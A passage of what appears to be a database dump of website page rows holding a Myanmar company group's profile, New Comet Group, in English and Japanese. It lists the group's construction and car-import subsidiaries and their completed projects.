&nbsp;Nay-Pyi-Taw Staff Housing Project<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Yandanar Pone College in Mandalay<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fire Station in Myawaddy Division<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Basic Education Middle, High Schools in various towns. (32 in total)<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fair-priced Housing Projects<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Private Housing<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Projects in Health Industry&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two storied Building (Technical School At Bo-Ka-Lay)<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two Storied RCC Building (MaUPin)</li></ul><blockquote><p>4. <strong>Zeya New Comet Auto Sale &amp; Services Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoListParagraphCxSpFirst\">Our Auto Trade Company was built from 1987 by buying permit of crew permit and importation and brother company New Comet Company Ltd. At 1990 established and private car, saloon car, truck car, bus car and spare-part importation from Japan. Besides Zeya New Comet Company we cooperate with other NEW ZAYYA SHWEPYI Company, AUNG NAY WIN Company, Tai Myint Aung Company made importation of private car, truck, Bus and spare-part from Japan for (25) years with the employment of 100 workers and purchase of import permit from Ministry of Commerce.&nbsp;<o:p></o:p></p><p class=\"MsoListParagraphCxSpLast\">Our ZEYA NEW COMET Auto Services Company appointed expert staff and import Japan Car for smooth operation for customer satisfaction.&nbsp;</p><hr><p class=\"MsoListParagraphCxSpLast\"><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 27, 199, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 199, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 227, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol><hr><blockquote><ol><li class=\"MsoListParagraph\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><strong>&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</strong></li></ol></blockquote><p class=\"MsoNormal\">New comet construction Co.Ltd was founded in 2004 with company Licence ( 295/ 2004-2005) and started operation construction projects , Import and sale of construction and industrial machinery and vehicles based in Yangon, Mandalay, Ayawaddy, Nay Pyi Taw, Sagaing States etc.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by our ``New Comet Construction\'\' Co.,Ltd are:&nbsp;<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">Nationalities Youth Resource Development Degree College ( Sagaing)</span><o:p></o:p></p><p class=\"MsoNormal\">• Sagaing University (two storyed classroom)<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">A joint venture housing project between Road Transport Administration Department and NEW COMET Construction Co.Ltd</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">In addition to the above projects :&nbsp;</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Departmental and private building construction and repair works</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of affordable housing for ex-employees in cities in Irrawaddy Region</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Architectural design modeling</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants, professional engineers, management office staff, project supervisors from the region and other regions, skilled workers and modern equipment</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious buildings, hospitals and schools.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">2. <strong>New Zayya Shwe Pyi Construction Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"mso-spacerun:yes;\">&nbsp;</span>New Zayya Shwe Pyi Construction Co.,Ltd was founded in May 30<sup>th</sup>, 2001 with Company Registration Number (191/ 2001-2002). We standed as one of the trustful companies and completed projects in educational, health care, industrial buildings, private housing, high rise condominium in both public and private sectors.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Throughout our existence, we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects. We built projects in areas such as Education, Health Care, Industrial Housing.<o:p></o:p></p><p class=\"MsoNormal\">Our Services are:<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Pre Construction-Service&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;General Contractor<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Design Builder</li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; Construction Manager</span></li></ul><blockquote><p>3. <strong>Aung Nay Wun Construction Co., Ltd</strong></p></blockquote><p class=\"MsoNormal\" style=\"margin-left:.5in;\">Aung Nay Wun Construction Co.,Ltd was founded in 2005 with company registration Number (265/ 2005-2006) emphasizing in residential, commercial, construction and interior design in private and government sectors. Some of the projects we have constructed are as follow:&nbsp;<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Nay-Pyi-Taw Staff Housing Project<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Yandanar Pone College in Mandalay<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fire Station in Myawaddy Division<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Basic Education Middle, High Schools in various towns. (32 in total)<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fair-priced Housing Projects<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Private Housing<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Projects in Health Industry&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two storied Building (Technical School At Bo-Ka-Lay)<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two Storied RCC Building (MaUPin)</li></ul><blockquote><p>4. <strong>Zeya New Comet Auto Sale &amp; Services Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoListParagraphCxSpFirst\">Our Auto Trade Company was built from 1987 by buying permit of crew permit and importation and brother company New Comet Company Ltd. At 1990 established and private car, saloon car, truck car, bus car and spare-part importation from Japan. Besides Zeya New Comet Company we cooperate with other NEW ZAYYA SHWEPYI Company, AUNG NAY WIN Company, Tai Myint Aung Company made importation of private car, truck, Bus and spare-part from Japan for (25) years with the employment of 100 workers and purchase of import permit from Ministry of Commerce.&nbsp;<o:p></o:p></p><p class=\"MsoListParagraphCxSpLast\">Our ZEYA NEW COMET Auto Services Company appointed expert staff and import Japan Car for smooth operation for customer satisfaction.&nbsp;</p><hr><p class=\"MsoListParagraphCxSpLast\"><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 27, 227, 'ja', 0, '<p>&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット グループ企業」は 1996 年に設立され、以下の支店で組織されています。<br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」<br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」<br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」<br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」<br>5.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット トレーディング エージェンシー 株式会社」</p><blockquote><h5><br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」</h5></blockquote><p><br>当社の「ニュー コメット コンストラクション株式会社」は2004年に会社登録番号(295/2004-2005)で事業を開始し、ヤンゴン地方域、エーヤーワディ地方域、ザガイン地方域、マンダレー地方域 とネピドー連合領土を拠点に自動車販売と建設機械の輸入、建設業を営んでおります。<br>当社「ニュー コメット コンストラクション株式会社」の2013-2014年と2014-2015年の竣工工事の一部は以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;国籍青少年資源開発大学(ザガイン)<br>-&nbsp;&nbsp;&nbsp;&nbsp;ザガイン大学 (教育と学習のための2階建ての建物)<br>-&nbsp;&nbsp;&nbsp;&nbsp;道路交通総局と「チェタゴンティッ建設会社」の住宅プロジェクト協力<br>&nbsp; &nbsp; &nbsp;上記の活動に加えて、</p><p>-&nbsp;&nbsp;&nbsp;&nbsp;政府機関および民間の建物の修繕工事<br>-&nbsp;&nbsp;&nbsp;&nbsp;エーヤーワディ地方域で元従業員向けに手頃な価格の住宅を建設<br>-&nbsp;&nbsp;&nbsp;&nbsp;建築設計図<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は、専門コンサルタント、専門作業員、管理責任者、工事監督者、その<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;他国内外の労働者とともに、基準に沿って最新化された資機材により、<br>&nbsp; &nbsp; &nbsp;建物、道路、橋梁の建設工事を行っております。<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は理念建築、病院、学校の設計図作成、強度計算などの慈善事業を可能<br>&nbsp;&nbsp;&nbsp;&nbsp;な限り手掛けさせていただきました。</p><blockquote><h5><br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤーシュエ ピィーコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」は 2000 年 5 月 30 日に設立され、会社登録番号は(191/2001-2002)です。当社は信頼できる企業の一つであり、教育、医療、産業建築、個人住宅を提供しており、政府および民間部門の両方で多くのプロジェクトが実施されています。会社の存続期間を通じて、複雑な建設プロジェクトにおける当社の細部へのこだわりと専門知識。 当社はコスト削減ソリューションを提供する能力でクライアントから多くの賞賛を受けています。教育、医療、工業用住宅など、多くのプロジェクトを建設してきました。<br>私たちは、<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設前サービス<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;土建屋<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;デザインビルダー<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設部長を提供させていただきました。</p><blockquote><h5><br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「アウン ネイ ワォンコンストラクション株式会社」は 2005年に設立され、会社登録番号は(265/2005-2006)です。同社は、民間および政府部門で住宅建築、商業建築、インテリアデザインのプロジェクトに従事しています。私たちのプロジェクトは以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;ネピドー職員住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;マンダレー ヤダナポン大学<br>-&nbsp;&nbsp;&nbsp;&nbsp;ミャワディ地域消防署<br>-&nbsp;&nbsp;&nbsp;&nbsp;さまざまな郡区の基礎教育中/高等学校。 (計32都市)<br>-&nbsp;&nbsp;&nbsp;&nbsp;手頃な価格の住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;民間住宅<br>-&nbsp;&nbsp;&nbsp;&nbsp;2階建ての建物 (ボガレ工科大学)<br>-&nbsp;&nbsp;&nbsp;&nbsp;RCC 2階建ての建物(マウビン)</p><blockquote><h5><br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の自動車商社は1987年に外国人船員の名義で輸入許可証の売買を行う個人事業として設立されました。「ニュー コメット」株式会社は1990年に設立され、「ゼヤー ニュー コメット オートセールスとサービス株式会社」の子会社です。 「家庭用自動車」「各種サルーン自動車」「各種商用トラック」「観光・輸送用各種バス」「各種機械」を日本より直接仕入れ、輸入販売を開始いたしました。<br>当社「ゼヤー ニュー コメット オートセールスとサービス株式会社」には、業務を促進する資格のある従業員がいます。 お客様に十分にご満足いただけるよう、良い車を日本から直輸入しております。</p>', '', 'full_html'),
('page', 0, 27, 227, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 241, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\"><img data-entity-uuid=\"ab23ef9a-b19e-44cb-859b-9e243b2192c9\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc.jpg\" width=\"100%\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol><hr><blockquote><ol><li class=\"MsoListParagraph\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><strong>&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</strong></li></ol></blockquote><p class=\"MsoNormal\">New comet construction Co.Ltd was founded in 2004 with company Licence ( 295/ 2004-2005) and started operation construction projects , Import and sale of construction and industrial machinery and vehicles based in Yangon, Mandalay, Ayawaddy, Nay Pyi Taw, Sagaing States etc.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by our ``New Comet Construction\'\' Co.,Ltd are:&nbsp;<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">Nationalities Youth Resource Development Degree College ( Sagaing)</span><o:p></o:p></p><p class=\"MsoNormal\">• Sagaing University (two storyed classroom)<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">A joint venture housing project between Road Transport Administration Department and NEW COMET Construction Co.Ltd</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">In addition to the above projects :&nbsp;</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Departmental and private building construction and repair works</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of affordable housing for ex-employees in cities in Irrawaddy Region</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Architectural design modeling</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants, professional engineers, management office staff, project supervisors from the region and other regions, skilled workers and modern equipment</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious buildings, hospitals and schools.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">2. <strong>New Zayya Shwe Pyi Construction Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"mso-spacerun:yes;\">&nbsp;</span>New Zayya Shwe Pyi Construction Co.,Ltd was founded in May 30<sup>th</sup>, 2001 with Company Registration Number (191/ 2001-2002). We standed as one of the trustful companies and completed projects in educational, health care, industrial buildings, private housing, high rise condominium in both public and private sectors.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Throughout our existence, we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects. We built projects in areas such as Education, Health Care, Industrial Housing.<o:p></o:p></p><p class=\"MsoNormal\">Our Services are:<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Pre Construction-Service&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;General Contractor<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Design Builder</li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; Construction Manager</span></li></ul><blockquote><p>3. <strong>Aung Nay Wun Construction Co., Ltd</strong></p></blockquote><p class=\"MsoNormal\" style=\"margin-left:.5in;\">Aung Nay Wun Construction Co.,Ltd was founded in 2005 with company registration Number (265/ 2005-2006) emphasizing in residential, commercial, construction and interior design in private and government sectors. Some of the projects we have constructed are as follow:&nbsp;<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Nay-Pyi-Taw Staff Housing Project<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Yandanar Pone College in Mandalay<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fire Station in Myawaddy Division<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Basic Education Middle, High Schools in various towns. (32 in total)<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fair-priced Housing Projects<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Private Housing<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Projects in Health Industry&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two storied Building (Technical School At Bo-Ka-Lay)<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two Storied RCC Building (MaUPin)</li></ul><blockquote><p>4. <strong>Zeya New Comet Auto Sale &amp; Services Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoListParagraphCxSpFirst\">Our Auto Trade Company was built from 1987 by buying permit of crew permit and importation and brother company New Comet Company Ltd. At 1990 established and private car, saloon car, truck car, bus car and spare-part importation from Japan. Besides Zeya New Comet Company we cooperate with other NEW ZAYYA SHWEPYI Company, AUNG NAY WIN Company, Tai Myint Aung Company made importation of private car, truck, Bus and spare-part from Japan for (25) years with the employment of 100 workers and purchase of import permit from Ministry of Commerce.&nbsp;<o:p></o:p></p><p class=\"MsoListParagraphCxSpLast\">Our ZEYA NEW COMET Auto Services Company appointed expert staff and import Japan Car for smooth operation for customer satisfaction.&nbsp;</p><hr><p class=\"MsoListParagraphCxSpLast\"><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
